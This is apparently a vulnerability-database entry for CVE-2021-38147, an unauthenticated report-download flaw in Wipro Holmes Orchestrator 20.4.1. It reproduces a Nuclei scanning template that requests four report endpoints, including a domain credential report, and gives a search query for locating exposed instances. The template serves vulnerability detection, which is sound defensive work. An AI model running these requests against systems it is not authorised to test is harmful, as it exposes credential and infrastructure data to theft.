Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-38147
HistoryJun 07, 2024 - 2:17 p.m.

Wipro Holmes Orchestrator 20.4.1 - Information Disclosure

2024-06-0714:17:05
ProjectDiscovery
github.com
9
wipro holmes orchestrator
information disclosure
remote attackers
arbitrary files
api access
authentication required
sensitive information
report downloads

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.2

Confidence

Low

EPSS

0.089

Percentile

94.7%

Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.
id: CVE-2021-38147

info:
  name: Wipro Holmes Orchestrator 20.4.1 - Information Disclosure
  author: securityforeveryone
  severity: high
  description: |
    Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.
  remediation: |
    Fixed In v21.4.0
  reference:
    - https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-38147
    - https://www.wipro.com/holmes/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-38147
    cwe-id: CWE-306
    epss-score: 0.00497
    epss-percentile: 0.76242
    cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: wipro
    product: holmes
    fofa-query: title="Holmes Orchestrator"
  tags: cve,cve2021,wipro,holmes,orchestrator

http:
  - method: GET
    path:
      - "{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel"
      - "{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel"
      - "{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel"
      - "{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains_all(header, 'application/vnd.openxml', 'attachment; filename=')"
          - "contains(body, '<?xml version=')"
          - "status_code == 200"
        condition: and
# digest: 490a0046304402201574f3a903c2aa2fef7a1aed98a6806409e0ea6070a5ec5953c0ce8f5f4a67ea02206083b0820b7625b5a2e325ca2570ef0c4072fc4cd8bd101c60c3f86ba9cabcee:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.2

Confidence

Low

EPSS

0.089

Percentile

94.7%

Related for NUCLEI:CVE-2021-38147